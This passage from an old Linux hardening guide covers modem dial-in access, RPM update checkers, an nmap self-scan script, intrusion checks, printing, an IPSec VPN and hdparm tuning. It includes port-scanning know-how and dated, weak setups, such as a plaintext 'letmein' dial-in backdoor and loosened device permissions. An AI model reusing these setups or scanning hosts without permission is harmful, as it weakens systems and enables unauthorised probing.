might block until the first sync was finished, and a triple-sync was just there to but time for the hard drive to finish writing out anything (disconnected SCSI drive, for example). I'm sure actually waiting 5-6 seconds after you typed the first sync would be just as good 90% of the time, but you know humans. (: -- So, to implement this: Redhat: * edit /etc/crontab and append: -- 0,10,20,30,40,50 * * * * root run-parts /etc/cron.10min -- * Now create the dir /etc/cron.10min -- mkdir /etc/cron.10min -- * create the simple file /etc/cron.10min/re-sync -- sync -- * Make it executable: -- chmod 700 /etc/cron.10min/re-sync -- * Finally, restart CRON -- /etc/rc.d/init.d/crond restart -- Slackware: * edit /car/spool/cron/crontabs and append: -- 0,10,20,30,40,50 * * * * root run-parts sync -- * Finally, restart CRON -- kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` -- From the Yashy-Hack list: -- Linux ext2 filesystems normally run asynchronously. While this makes them faster, it also makes them somewhat less reliable, especially on systems with long uptimes. If you're running a production machine (ie that people are depending on), you can make filesystems run in synchronous mode by adding the flag 'sync' to the options section in /etc/fstab - right now that section likely says 'defaults', or maybe one of the quota options. The filesystems will be slower, but they'll also be more reliable. This is one reason I personally prefer FreeBSD for servers, though I use Linux for my router and notebook, and frequently for workstations. The BSD ufs filesystem, which defaults to synchronous operations, is in my experience more robust for long uptimes on heavily used systems. >From the FreeBSD mount manpage: async All I/O to the file system should be done asynchronously. This is a dangerous flag to set, and should not be used unless you are prepared to recreate the file system should your system crash. ================================================================================ ================================================================================ Section 42 - Dial-in terminal / PPP access via a modem NOTE: There are several "gettys" out there and it isn't totally clear on how they are different. But, here is a little snipet from /usr/doc/getty_ps-2.0.7j/README.hi-speed: -- I've only tested uugetty on dialin lines (with a Zoom v34X 36.6K) at 57.6 and 115.2Kbps. I generally use agetty for dumb terminals, mingetty for the console, and faxgetty calling agetty for combination fax/data lines. (hylafax) -- - edit /etc/inittab Redhat: - Find the line that says: "6:2345:respawn.." and copy it to also say (for a modem on COM1): "7:23456:respawn:/sbin/uugetty ttyS0 38400 vt100" - Create the file /etc/default/uugetty.ttyS0 (for dialins on COM1) NOTE: This config assumes you are using a modem on COM1, that it is going to answer the phone after -6- rings and before the user is shown a "Login:" prompt, the user will have to blindly enter in the password "letmein". -- # [ put this file in /etc/default/uugetty. ] # # sample uugetty configuration file for a Hayes compatible modem to allow # incoming modem connections # # this config file sets up uugetty to answer with a WAITFOR string. When # using waitfor, it is necessary to specify INITLINE=cua? # line to use to do initialization. All INIT, OFF, and WAITFOR functions # are handled on this line. If this line is not specified, any other # program that wants to share the line (like kermit, uucp, seyon) will # fail. This line will also be checked for lockfiles. # # format: (without the /dev/) INITLINE=ttyS0 # timeout to disconnect if idle... TIMEOUT=60 # modem initialization string... Sets the modem to disable auto-answer # # format: ... (chat sequence) #INIT="" \d+++\dAT\r OK\r\n ATH0\r OK\r\n AT\sM0\sE1\sQ0\sV1\sX4\sS0=0\r OK\r\n INIT="" \d+++\dAT\r OK\r\n ATH0\r OK\r\n ATS0=6\r OK\r\n # waitfor string... if this sequence of characters is received over the line, # a call is detected. #WAITFOR=RING WAITFOR=CONNECT # this line is the connect chat sequence. This chat sequence is performed # after the WAITFOR string is found. The \A character automatically sets # the baudrate to the characters that are found, so if you get the message # CONNECT 2400, the baud rate is set to 2400 baud. # # format: ... (chat sequence) #CONNECT="" ATA\r CONNECT\s\A CONNECT=letmein # this line sets the time to delay before sending the login banner DELAY=1 -- - Finally, make sure your modem is connected and powered up and now tell Linux to initialize the modem with: /sbin/init q Thats it. Go ahead, dial in with a modem and let it RING (6) times. After the sixth ring, the modem should answer and you should then be dropped to "nothing". Now blindly type in "letmein" and you should then see a normal Linux "login:" prompt. For PPP connectivity: --------------------- To do your work via PPP instead of doing it via a standard terminal, follow the PPP setup recommendations in [Section 22]. Then, after you successfully login and are dropped to a UNIX prompt, simply type in the following (for a modem on COM1): /usr/sbin/pppd /dev/ttyS0 38400 NOTE: Many of you would probably rather have Linux default to a PPP only mode. To me, this is far more inflexiable and what happens if you aren't on a system that doesn't have PPP functionality? Doing it this terminal-->ppp way is MUCH more flexible. Dialing in with answering machines: ----------------------------------- - The following is VERY dependant on your home answering machine - If you are like me, you only have one phone line and there is an answering machine on that line that answers the phone around call 3 or 4. To get past this, I can get into my answering machine remotely and turn it OFF. Once off, the linux's modem will answer after -6- rings. Once I'm done dialing in, I TEMPORARILY disable uugetty in /etc/inittab, rerun "/sbin/init q", and then re-call my answering machine with 15 rings. After that, the machine will turn back on. Once this is set, you'll need to re-enable uugetty in the /etc/inittab file and rerun "/sbin/init q" from a TELNET/SSH connection. With that all behind you, if you ever make a mistake editing your IPFWADM rulesets, your Inet connection is down, etc, you now have a secured BACKDOOR into your machine! ================================================================================ ================================================================================ Section 43 - Automated RPM notifiers The tool "rpmwatch" creates reports based on Redhat's WWW site. As you might notice, this is only for Redhat and its RPMs. In addition to this, it does NOT work on Redhat's newer WWW pages nor sites for Mandrake, etc. Because of this, I have started implimenting "AutoRPM" as shown below. AutoRPM (the preferred solution): --------------------------------- - Download AutoRPM and the Perl "libnet" library from the URLs in [Section 5] - Uncompress AutoROM some temporary place like /usr/src/archive/rpm-tools/ tar xzvf autorpm-*.tar.gz /usr/src/archive/rpm-tools - The LibNet module is a commonly installed tool with Perl. To verify that its already installed, run: find /usr/lib/perl5/ | grep FTP.pm if nothing shows up, LibNet isn't installed - If it isn't installed, uncompress the LibNet library to a place like /usr/src/archive/cpan tar xzvf libnet-*.tar.gz - Next, got into the new libnet directory, compile, and install it: cd /usr/src/archive/cpan/libnet-* perl Makefile.PL make make test make install - Next, go into the new AutoRPM directory cd /usr/src/archive/rpm-tools/autorpm-* - Create its configuration directories mkdir /etc/autorpm.d mkdir /etc/autorpm.d/pools - Copy over the program, the configuation files, and the man pages cp autorpm.pl /usr/local/sbin cp autorpm.conf /etc/autorpm.d cp autorpm.d/* /etc/autorpm.d cp pools/* /etc/autorpm.d/pools cp autorpm.8 /usr/local/man/man8 cp autorpm.conf.5 /usr/local/man/man5 - Fix its permissions: chmod 700 /etc/autorpm.d /etc/autorpm.d/pools chmod 700 /usr/local/sbin/autorpm.pl - Next, test it: Mandrake 6.1 users: /usr/local/sbin/autorpm.pl --ftp ftp.linux-mandrake.com:/pub/updates/6.1/RPMS/ Redhat 6.1 users: /usr/local/sbin/autorpm.pl --ftp updates.redhat.com:/ftp:/6.1/i386/ If that test works ok, time to tune your /etc/autorpm.d/setup: Mandrake 6.1 users: ------------------- - Find the following lines in /etc/autorpm.d/autorpm.conf /etc/autorpm.d/autorpm.conf -- Config_File("/etc/autorpm.d/redhat-updates"); -- to -- Config_File("/etc/autorpm.d/mandrake-updates"); -- - Create the file /etc/autorpm.d/pools/mandrake-updates . In this file, put at LEAST the following line on the top. If you want, you can add other Mandrake mirror URLs in this file as well. I have listed (2) others for an example: /etc/autorpm.d/pools/mandrake-updates -- ftp.linux-mandrake.com:/pub/updates/6.1/RPMS rpmfind.net:/linux/Mandrake/updates/6.1/RPMS ftp.orst.edu:/pub/packages/linux/mandrake/updates/6.1/RPMS -- - Next, create the following file. Edit as you deem fit. Please note that I'm still in the process of learning and tuning this tool, if you have comments, etc, please let me know. /etc/autorpm.d/mandrake-updates -- ########################################################## # This one will mirror the updates for all versions # of Red Hat 5.0, but won't bother with the source RPMs. # All the updates stored locally will be in architecture- # specific directories just like on the original site. ftppool ("mandrake-updates") { # Recurse through the remote FTP site if necessary # Recursive (Yes); # Compare, recursively, the remote files to this directory # Recursive_Compare_To_Dir ("/usr/src/archive/md61-updates"); # Ignore any directories named 'SRPMS' when recursing. # Regex_Dir_Ignore ("SRPMS"); # What to do if the remote RPM is a newer version # that the local copy action (updated) { # Delete whatever local file we had that was older # than the remote file. # Delete_Old_Version (Yes); # Store the remote file in this local directory. # the 'Recursive' part means that if the remote # file was in the /i386/ subdirectory, it will be # stored in a /i386/ directory locally. # Recursive_Store ("/usr/src/archive/md61-updates"); Install (Interactive); Report (Yes); Report_Queues_To ("root"); Report_To ("root"); Report_All (Yes); Display_Report (Yes); } # What to do if the remote RPM has no corresponding # version locally (i.e. it is new) action (new) { Install (Interactive); Report (Yes); Report_Queues_To ("root"); Report_To ("root"); Report_All (Yes); Display_Report (Yes); # Store_Recursive ("/usr/src/archive/md61-updates"); } } -- Once you are happy with how AutoRPM runs, I recommend have it run ONCE A DAY. To do this, do the following: ln -s /usr/local/sbin/autorpm.pl /etc/cron.daily/autorpm Finally, I recommend to read the "autorpm" man page and pay attention to the "auto-ignore" file. There is a lot of other interesting info in the man page so I recommend that you read it. Its well written too! rpmwatch -------- Download at RPM Watch from [Section 5] rpm -Uvh rpmwatch-x.x-x.noarch.rpm Create the file "run-rpmwatch" with the following contents: NOTE: You need to edit the scripts to reflect your Redhat distribution installation. If you don't change the script to look to the proper URLs, your results will be worthless. On that same token, I request all the patches out there for ALL Redhat distributions though I only run 5.0. While this lets me know whats out there, some of the updated tools in 5.2 will NOT work correctly on 5.0 distributions. So.. be careful and be SURE to read the "Testing RPMs before installing" at the top of Section 50 to see what files might be overwritten, etc. /usr/local/sbin/run-rpmwatch -- #!/bin/sh # Version v1.2 echo "Getting RH50 errata.." lynx -source http://www.redhat.com/corp/support/errata/rh50-errata-general.html > /tmp/rh50-errata-general.html lynx -source http://www.redhat.com/corp/support/errata/intel/rh50-errata-intel.html > /tmp/rh50-errata-intel.html echo "Getting RH51 errata.." lynx -source http://www.redhat.com/corp/support/errata/rh51-errata-general.html > /tmp/rh51-errata-general.html lynx -source http://www.redhat.com/corp/support/errata/intel/rh51-errata-intel.html > /tmp/rh51-errata-intel.html echo "Getting RH52 errata.." lynx -source http://www.redhat.com/corp/support/errata/rh52-errata-general.html > /tmp/rh52-errata-general.html lynx -source http://www.redhat.com/corp/support/errata/intel/rh52-errata-intel.html > /tmp/rh52-errata-intel.html echo "Converting to TXT..." href2txt /tmp/rh5*-errata-*.html > /tmp/rh-errata.txt rm -f /tmp/rh5*-errata*.html echo "Running rpmwatch.." rpmwatch -e /tmp/rh-errata.txt echo -e "\n\nA good site to get all Errata RPMS is:" echo "ftp://ftp.codemeta.com/pub/mirrors/redhat/updates/" rm -f rh-errata.txt echo -e "\nDone.." -- - Now, make "run-rpmwatch" executable by running "chmod 700 rpm-watch" - Run it by typing in "./run-rpmwatch" The output should look something like: [root@roadrunner tools]# ./run-rpmwatch Getting RH50 errata.. Converting to TXT... Running rpmwatch.. . FL RPM VERSION BUILD UPDATE ---------------------------------------------------------------------- samba 1.9.18p10 5 ok rpm 2.5.3 5.0 ok rpm-devel 2.5.3 5.0 ok B bash 1.14.7 6 1.14.7-11 *** NOTE: please see the bottom of this section on adding this script to a weekly CRON process! * Regardless of the tool that you use, I'd recommend that you add it CRON to be executed once a week. Since RPMWATCH is the only tool currently running, I'll use that for an example: Slackware: Edit the file /var/spool/cron/crontabs/root and append the following: -- # Run the sendlogs program at 12:00am everyday 02 2 * * 0 /usr/local/sbin/run-rpmwatch Redhat users: Create a symbolic link to point to the run-rpmwatch script: ln -s /usr/local/sbin/run-rpmwatch /etc/cron.weekly - Thats it. Now, make cron re-read it's config files by doing: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` ================================================================================ ================================================================================ Section 45 - Nmap portscanner Once you have secured your Linux box and implemented a good packet firewall, you need to TEST it to make sure you didn't miss anything. To do this, I recommend that you either portscan yourself from an unprivledged IP address or have a buddy do it for you. The following instructions is on how to install Nmap and run it to check your host. - Download the newest version of nmap from [Section 5] - Uncompress it (tar xzvf nmap-*.tgz) - cd into the new nmap directory and run "./configure" - Nmap will now configure itself - Now just run "make" and then "make install" - Thats it! Nmap is installed! Now, nmap supports over 10 different portscans and running each one takes a while. So, I recommend that you setup this little script to ease the pain: scan-it -- #!/bin/sh echo -e "\nPort Scanning $1 - TCP connect\n" ./nmap -sT $1 echo -e "\nPort Scanning $1 - SYN\n" ./nmap -sS $1 echo -e "\nPort Scanning $1 - FIN\n" ./nmap -sF $1 echo -e "\nPort Scanning $1 - Xmas\n" ./nmap -sX $1 echo -e "\nPort Scanning $1 - Null\n" ./nmap -sN $1 echo -e "\nPort Scanning $1 - UDP\n" ./nmap -sU $1 echo -e "\nPort Scanning $1 - Ident\n" ./nmap -I $1 echo -e "\n\n\nNmap done.\n\n" -- - Next, make it executable by running "chmod 700 scan-it" - Finally, to run a scan, just type in: scan-it Where is the IP address you want to scan. Once you start the scan, it will take a while so just relax and wait a while. NOTE: Be warned: - Nmap 2.0x portscans will CRASH Cisco IOS 11.3/x / 12.0.x routers that have SYSLOG enabled. - If you implemented a IPFWADM/IPCHAINS ruleset that logs failed connections, your logs will get MASSIVE. Many of NMAP's portscans scan all 65,535 ports. Now: 65,535 ports * 7 = 458,745 lines in your SYSLOG files! ================================================================================ ================================================================================ Section 46 - So you think you are being hacked.. Confirm it! Once you've followed TrinityOS to a "T", you can be assured that your box is pretty stinken secure. BUT.. nothing is 100% secure and there will always be a chance that a hacker will find a way into your box. With this in mind, please read what Brad Alexander had to say: "As with system administrators and security specialists, there are varying levels of skill among the system crackers. The notes included in this document, and in fact, any notes about what to look for is subjective, since the cracker will endeavor to cover his tracks. This may include the use of a rootkit, which inserts trojaned binaries such as "ls", "login", "ps" and so forth and hides sniffers on your system, editing out parts of your logfiles, and the like. The attacker may create directories such as "..." or ".. " to hide his warez. The attack, like the individual cracker, will have different personalities. Your best bet, aside from keeping the intruder out, is to run overlapping layers of intrusion detection software, both host-level (such as Abacus Sentry) and network level (such as SHADOW and Network Flight Recorder). If the cracker attempts to disable one system, it will trigger another. The same should be said for your file monitors, (e.g. Tripwire and ViperDB). However, there is no substitute for a familiarity with your system and your filesystem." Couldn't have said it better. So.. with all that in mind, here is my best initial stab at figuring out if you've been hacked: Here is a quick list that you can follow: 1) Check for any "ESTABLISHED" connections to your box by running "netstat -a | more". If there are connections to your box other than SMTP (port 25 for mail), DNS (port 53), and possibly WWW (port 80) that you don't know about, this should raise a flag. Especially look for SSH, TELNET, or FTP conenctions. 2) Using your favorite file viewer (vi, Pico, less, etc), look at your log files for strange things like: - changed passwords - strange connections from unknown IPs You can also use the "pwck" and "grpck" commands to check these file too. 3) Run "last | more" command to see what users have recently logged into your machine. 4) Check the date of the /etc/shadow file to make sure it hasn't been recently changed 5) If you question the integrity of any of your executable files, verify that they are ok: Redhat: rpm -Va or you can use the following script: -- #!/bin/sh for pkg in `rpm -qa`; do echo "Verifying $pkg" >> /tmp/verify.log rpm --verify $pkg >> /tmp/verify.log done -- If your box HAS been compromised: 1) Disconnect the machine's network connection, be it a modem, Ethernet connection, etc. 2) Try to determine what the hacker did to your box: - look at /root/.bash-history - look at the slackware:/var/adm or redhat:/var/log log files 3) If you installed Tripwire, re-run it and see what files were changed. If your machine was compromised and you are unable to determine what was hacked, you have to consider that ALL security on this box has been breeched. Because of this, you'll need to backup all changed user files (NO EXECUTABLE FILES WHAT SO EVER), wipe ALL HDs and either restore from a known good backup or re-install the OS from scratch! Eouch! [Once I get more time, I will expand on this section] ================================================================================ ================================================================================ Section 47 - UNIX and Samba Printing This example is primaraly to get Samba printing working but it will work fine for local UNIX printing too. This example assumes you have a HP LaserJet IIp and its connected on LPT1 (not LPT0). - It has been usually understood that using the BSD "lpd" program is a *HIGH* security risk. The reason for this was because the various "lp" tools have SUID ROOT permissions. Meaning that when anybody runs the "lpr" program, the program will actually run as if "root" ran it. Though we can't do anything about this for "lpr", we can fix things for "lpd" Increase the permissions on the /dev/lp* devices and remove the SUID bit from "lpd". What does open up the permissions on /dev/lp* do against you? People could possibly cat text to it and make it run out of paper but who cares!!! The permissions were in /usr/bin/ -- -r-sr-sr-x 1 root root 13876 Oct 1 21:55 lpq -rwxr-xr-x 1 root root 2406 Aug 15 1998 lpqall.faces -r-sr-sr-x 1 root root 15068 Oct 1 21:55 lpr -r-sr-sr-x 1 root root 14732 Oct 1 21:55 lprm -rwxr-xr-x 1 root root 3492 Oct 1 21:55 lptest -rwxr-xr-x 1 root root 2507 Oct 11 00:15 lpunlock -- to chmod 700 /usr/sbin/lpd chmod 755 /usr/bin/lp* chmod 4755 /usr/bin/lpr and chmod 660 /dev/lp0 One note about the file perms on "lpr" from [Section 8] #NOTE: I feel setting "lpr" to allow any group to execute it is # a bad thing. # # I would like to add UNIX users and even the Samba process to # the "lp" group already defined in /etc/groups and then be able # to put things back to to 4750. BUT.. I just talked to a buddy # of mine and this really isn't possible. Linux doesn't support # multiple groups per file and Linux doesn't support access lists # (ACLs') yet. So.. you either have to do all this or run LPRng. - Next, create the /etc/printcap file and put in the following. Please note that this example is for a HP LaserJet IIp on LPT1 and a Epson Stylus 500 Color ink jet on LPT2. The following "lp" setting is for local UNIX printing and "Hp_Lj2p" is for Samba printing -- ##PRINTTOOL3## LOCAL ljet2p 300x300 letter {} LaserJet2p Default 1 lp:\ :sd=/var/spool/lpd/lp:\ :mx#0:\ :sh:\ :lp=/dev/lp1:\ :if=/var/spool/lpd/lp/filter: ##PRINTTOOL3## LOCAL epsonc 240x216 letter {} EpsonLQ24 Default {} lp2:\ :sd=/var/spool/lpd/lp2:\ :mx#0:\ :sh:\ :lp=/dev/lp2:\ :if=/var/spool/lpd/lp2/filter: Hp_Lj2p|raw:\ :rw:sh:\ :mx#0:\ :lp=/dev/lp1:\ :sd=/var/spool/samba:\ :fx=flp Epson_S|raw:\ :rw:\ :sh:\ :mx#0:\ :lp=/dev/lp2:\ :sd=/var/spool/samba:\ :fx=flp -- - Next, you need to re-enable "lpd" from [Section 8] and then load up the lpd daemon: - Redhat: /etc/rc.d/init.d/lpd start - Slackware: /usr/sbin/lpd -l& - If you are runngin Samba, you'll have to edit your /etc/smb.conf file as shown in the Samba section of TrinityOS and then re-start the SMB process. - From here, Samba Printing should work fine. - If you want to do native UNIX printing, it starts to get VERY crazy without a configuration tool. I could post my /var/spool/lpd/lp/filter file but its over 9K and specific to the way Redhat does things! So, I highly recommend to a GUI tool native for your specific distribution. - Redhat: Xwindows-GUI: printtool (via control-panel) NOTE: The Hp Laserjet needs the "anti-staircase" option - Slackware: ??? - Once the GUI tool sets up your printer, things should be good to go. To be honest, it SUCKS that I'm not documenting how to do it via a command line but I have to say that UNIX printing is so damn hard! Oh well.. sorry! ================================================================================ ================================================================================ Section 48 - IPSec (SWAN) Virtual Private Network (VPN) [Almost complete] IPSEC is the new, standards-based way of setting up a Virtual Private Network (VPN) between two computers. Though IPSEC was originally designed for the new IPv6 (IPng) TCP/IP protocol, it is also being deployed for the TCP/IPv4 (normal TCP/IP) too. If you don't know what a VPN is, imagine a network at work that is on the Internet but behind a strong firewall. Unless you have remote access into work, you can't get to any of those machines huh? Not anymore! If your work has a connection to the Internet and a IPSEC VPN server (be it Linux, Cisco, etc), you'll now have ability of accessing your computers internal to your work via the Internet in a secure and 128-bit encrypted fashion. Though you're access speeds and even availably will be Internet-weather dependant, its both a GREAT and CHEAP method of remote access. Common questions include: * Is IPSEC only for Linux? No way! Who else can connect? Currerntly, there have been several ports that Linux's SWAN IPSEC VPN works with: - YES: Cisco IOS-based routers (in 168bit 3DES mode not 1DES) - YES: Axent's Raptor VPN - NO: Bay Contivity Extranet v2.02 in either "Single Client - Agressive" mode or "Remote Network - Main mode" I'm sure other vendors will be added to this list as time goes on. * Is it RFC complient? Linux FreeS/WAN is an implementation of IPSEC. It does not yet implement all of IPSEC, but everything it does follows the IPSEC RFCs. * What about Performance and CPU utilization? Someone has tested the SWAN VPN with a Cisco 2501 and a 486/DX50 across as T1. The 486's CPU utilization was about 15% while the 2501's utilization was about 80%! One benchmark seens with Triple DES (our default bulk encryption method) can do 1.6 megabytes per second on a Pentium 200. That's > 10 megabits/second. (on a 100Mbit LAN: with the OLD SWAN code : Newer SWAN code should run roughly 3x faster on Intel x86 systems: * No IPSec * DES * 3DES P200 = >80 Mb/s P200 = 10-15 Mb/s P200 = 2-4 Mb/s P450 = >80 Mb/s P450 = 20-25 Mb/s P450 = 10-14 Mb/s I think encryption is what degrades performance the most, and you would be best off with a HW accelerator if you want to get closer to max. *** NOTES: - Please note that I haven't had the time to bring this up myself yet but I've had a few users that said that they did. If you have any comments, ideas, changes, please email me. - Please see the Gotchas at the end of this section regarding DHCP, IPFWADM/IPCHAINS rulesets, etc. - If you have problems with the SWAN code, please join the SWAN email list for support. I cannot help at the moment since I don't have a SWAN setup running -- FreeSwan/IPSec installation instructions for Linux v1.20 Clarifications made and added a Gotcha regarding : dranch v1.10 Additions by David A. Ranch v1.00 by Rob Hutton ----------------------------------------------------------------------------------------------- NOTE: You should also be able to terminate the VPN on the Linux box directly. This isn't documented here yet but it will be done in the TrinityOS doc. Until then, you'll have to figure it out. NOTE2: This document assumes that you are running this initially WITHOUT a firewall. Once its running, see the bottom for the relivant IP ports to allow though the IPFWADM/IPCHAINS/etc rulesets. ----------------------------------------------------------------------------------------------- If you have not configured and built your own kernel, do so. The FreeSwan utilities depend on the results. Instructions for that can be found at Once you have compiled and built your own kernel, draw a simple diagram as follows: | Machine (S) | | Machine (G) | | Machine (H) | | Machine (T) | | Remote Host |<--->|Remote Firewall/VPN|<...>|Local Firewall/VPN|<--->| Local Host | | IP: | | IP: | | IP: | | IP: | Record all IP addresses, and their associated interface and netmask, and the routing tables from each machine. Then, it is CRITICAL to first TEST you network connectivity before you attemp to setup the VPN. It is recommended that the (S) machine can ping (T) and that (T) can ping machine (S). Also test any other services that you will be using such as TELNET, SSH, FTP, SMTP, etc . NOTE: If *either* protected network is privately addressed, please see the note in the "Notes and Gotchas" Section. [DO THE FOLLOWING ON BOTH MACHINES] Download the newest version of SWAN (preferably the current "snapshot" code) from the sites found in [Section 5] Uncompress the file using: tar xvzf freeswan-X.tar.gz or your favorite uncompress command where "X" is the newest version of SWAN. This will create a directory called freeswan-X with the sources and installation files in it. I recommend that you print the INSTALL and doc/vpn.how file to refer to. cd to the freeswan-X directory. Build the libraries, programs, and utilities by typing: make Then install them by typing: make install Edit the /etc/sysconfig/ipsec file. Look for the KLIPSINTERFACES variable. Change it to reflect the interface that you will be using to run the VPN across. NOTE: This assumes you are running Redhat Linux Next, install the kernel patches be typing: make insert CD to the LINUX source directory and run menuconfig: cd/usr/src/linux make menuconfig The following networking options should now be set on: IP: forwarding/gatewaying IP: tunneling Kernel/User network link driver If it is not enabled, set the following on: IP: optimize as router not host You should also have new options at the bottom of the page for "IP Security Protocol (IPSEC)" which should be enabled. Now exit and save your configuration, and remake and install the new kernel. When you are finished, reboot to activate the changes. Next, edit the /etc/services file and add the following (if not there already): -- isakmp 500/tcp isakmp isakmp 500/udp isakmp -- Again, verify that you can ping, telnet, ftp, etc. from one host/workstation to the other (T to S and S to T) in both directions. [DO THE FOLLOWING ON ONE OF THE FIREWALLS. I WILL USE G] Edit the /etc/ipsec-auto file. Change the left=[id address] to be the ip address of the NIC you are running the VPN across on machine G. Change leftsubnet=[ip address/netmask bits] to the address/netmask of the private/protected subnet on machine G. If the machines are not directly connected (on the same network), change the address of leftnexthop=[ip address] to the address of the next router between G and H. Now edit the corresponding "right" variables to match the configuration of H. Exit and save your changes. Edit the /etc/ipsec-manual file. Make the same changes to the snt connection and delete all of the other connections. Exit and sve your changes Edit the /etc/isakmp-secrets file. Change the IP addresses (the first column) to match the addresses of the nics that are running the VPN. Exit and save your changes. Copy the ipsec-auto, ipsec-manual, and isakmp-secrets from G to H. Using a floppy is the best way to make sure that the files do not get corrupted. Make sure that the files on both machines are owned by root and have permissions rw-------. Again, reboot both machines. Examine the /var/log/messages (for Redhat users) to make sure that IPSEC loaded without any error messages. Also, verify that the following entries exist in the /proc/net/ directory: ipsec_eroute ipsec_spi ipsec_spigrp ipsec_spinew ipsec_tncfg ipsec_version Verify that ipsec is attached to the correct NIC by typing: cat /proc/net/ipsec_tncfg on (host G) type: ipsec manual snt up Then on (Host H) type the same thing. Now type ipsec look on either machine. You output should look something like: foo.spsystems.net Wed Nov 25 22:52:45 EST 1998 ------------------------------------- 10.0.1.0/24 -> 11.0.1.0/24 => tun0x200@11.0.0.1 esp0x2@11.0.0.1 ------------------------------------- tun0x200@11.0.0.1 Ipv4_Encapsulation: dir=out 10.0.0.1 - > 11.0.0.1 etc. etc. etc. If it does, your VPN is up. You can test it by doing a tcpdump in between the two machines. You should see data transmitted back and forth over IP protocol 50. Test each subsystem to make sure they work using FTP, TELNET, SMTP, etc. Now type the following on both boxes: ipsec manual snt down Now type the following on both boxes: ipsec auto snt add ipsec auto snt up Again, test to see that each subsystem works. Auto-starting the VPN: Edit the /etc/sysconfig/ipsec file on both machines. Near the bottom add "snt" to both the PLUTOLOAD and PLUTOSTART variables. Now reboot both machines, and the VPN should start automaticly. Bugs and Gotchas: ----------------- Newest fixes and patches: ------------------------- The lasest SWAN code is always in the snapshot.tar.gz file. If you cannot get SWAN to work, etc, you might want to try installing the snapshot as there have been many changes since the x.91 code was released. Private addressing: ------------------- If either network is privately addressed and you are running over the internet you will not be able to do this. In this case, if you can ping devices on the internet outside of your network from the VPN servers (machines G and H), routing is probably correct. Once the tunnel is up, you will not be able to see any machine on the remote subnet from the gateway machine (G or H), so make sure you are testing the VPN from client machines on the protected subnets, not the gateway machines themselves. DHCP ---- Currently, DHCP will return with an unknown device type error after you install the SWAN patches (It will do this whenever you set up a tunneled interface) and then exits. To fix this, download the DHCP source from the URL in [Section 5]. Next, in the DHCP source code, ADD the following BEFORE the "ARPHRD_ETHER" case statement: NOTE: This issue might have been fixed in newer released of Swan common/dispatch.c -- case ARPHRD_TUNNEL: /* ignore tunnel interface */ break; -- After this done, compile DHCP per the instructions in the README Automatic SWAN startup ---------------------- The other problem is that the automatic startup documented above does not work. They are looking at why now. There is a workaround. It is as follows: Create a rc.ipsec in the rc.d directory. For each connection add the following to it: ipsec auto [connection name] add ipsec auto [connection name] up ...[eof] Set the file permissions to rwx-------. Then run it from the rc.local Running SWAN through a IPFWADM/IPCHAINS/other firewall: -------------------------------------------------------- You have to allow the IPSEC traffic through your IPFWADM/IPCHAINS firewall rulesets. Port 500 is the key negotiation daemon. The ISAKMP tool does the key negotiation and then passes the keys to the daemon that runs the VPN. In FreeSwan, the daemons are called Klips and Pluto respectively. Once you run the "ipsec auto [connection name] add" there is an interface called ipsec0, ipsec1, etc. According to the programmer, port 92 is used in both directions, but when I set up my rules this way, I cannot get the tunnel up, so I'm going to do some more packet captures. After further investigation, I found the following rules to work: NOTE: "other end's IP" is the remote VPN machine' Internet (external) IP address "this end's IP" is the local VPN machine's Internet (external) IP address IPFWADM 2.0.x kernels: -- ## Inbound Ruleset /sbin/ipfwadm -I -a accept -b -W $EXTIF -P udp -S [other end's IP] isakmp -D $EXTIP isakmp ## Outbound ruleset /sbin/ipfwadm -O -a accept -b -W $EXTIF -P udp -S $EXTIP isakmp -D [other end's IP] isakmp -- IPCHAINS 2.2.x kernels: -- ## Inbound Ruleset /sbin/ipchains -A input -j ACCEPT -i $EXTIF -p udp -s [other end's IP] isakmp -d $EXTIP isakmp ## Outbound Ruleset /sbin/ipchains -A output -j ACCEPT -i $EXTIF -p udp -s $EXTIP isakmp -d [other end's IP] isakmp -- ================================================================================ ================================================================================ Section 49 - IDE HDs performance optimization via hdparm With the invention of IDE hard drives, which replaced the classic MFM, RLL, and even ESDI HDs of the past, things got much easier and cheaper. Unlike IDE, SCSI usually operates at top performance where as IDE must be tuned for the system the IDE HD is installed into. The command to do this with Linux is HDPARM. With IDE HDs, you can configure (read the hdparm man page for a full list of feature with better descriptions): - multcount - The number of sectors the HD can transfer per system interupt. Default is 1 and the max depends on your HD. - I/O support - The data transfer mode the HD operates in. The default is 16bit though you can put it into 32bit mode if the IDE controller supports it. - unmaskirq - This allows the OS to listen to other interrupts while a data transfer is taking place. Though this can speed things up, this can make your system unstable if you have a poor IDE chipset. Read the man page for more details. - using_dma - With new UltraDMA (UDMA) hard drives and supporting UDMA controllers. UDMA is a technique to let the IDE chipset transfer data directly from HD to memory without bothering the CPU. Because of this, you can greatly reduce CPU utilization for big IDE transfers. NOTE: I've tried using this parameter in the past and it ALWAYS has crashed the machine (P-II 400Mhz with IBM 16.8GB UDMA HDs). Your milage will vary. Anyway, first, lets get an idea of what HDPARM see's for /dev/hda (my first IDE HD): Notice that I use "-I" to get the current HD setup settings: /sbin/hdparm -I /dev/hda /dev/hda: Model=DW CCA1300H0, FwRev=911.E922, SerialNo=DWW-2T27 Config={ HardSect NotMFM HdSw>15uSec SpinMotCtl Fixed DTR>5Mbs FmtGapReq } RawCHS=2100/16/63, TrkSize=57600, SectSize=600, ECCbytes=4 BuffType=3(DualPortCache), BuffSize=128kB, MaxMultSect=16, MultSect=16 DblWordIO=no, maxPIO=1(medium), DMA=yes, maxDMA=2(fast) CurCHS=2100/16/63, CurSects=2116800, LBA=yes, LBAsects=2116800 tDMA={min:150,rec:150}, DMA modes: sword0 mword0 mword1 IORDY=on/off, tPIO={min:380,w/IORDY:180}, PIO modes: mode3 What does all this mean? Ok: Line 1 - Its a WD drive with a model# of CCA1300H0 with the serial# (why is WD reversed? Dunno.. it doesn't that with the "/sbin/hdparm -i" command. Eh...) - Line 2 - This lists the HDs technical abilities. This isn't the forum to describe them but if you are curious, email me. - Line 3 - CHS stands for Cylinder, Head, Sectors and describes the HDs geometry. It also tells you the technical aspects of the geometries. - Line 4 - Tells you the HDs caching system, the size of the cache, the HD's maximum number of sectors or BLOCKs per interrupt, and the current BLOCKs per intertupt setting. - Line 5 - The HD is in 16bit mode, the current PIO or Programmed I/O data transfer mode is Mode1. I'm not sure what the (medium) means though. It also says that this drive DOES support DMA and the max supported *DMA* mode is Mode2. - Line 6 - This tells you what Linux is using for the HD geometry (yes, it can be different than the actual HD's geometry). It also counts the total number of HD sectors, the HD is running in Logical Block Addressing (LBA) mode, and the total number of LBA blocks. NOTE: LBA mode is critical 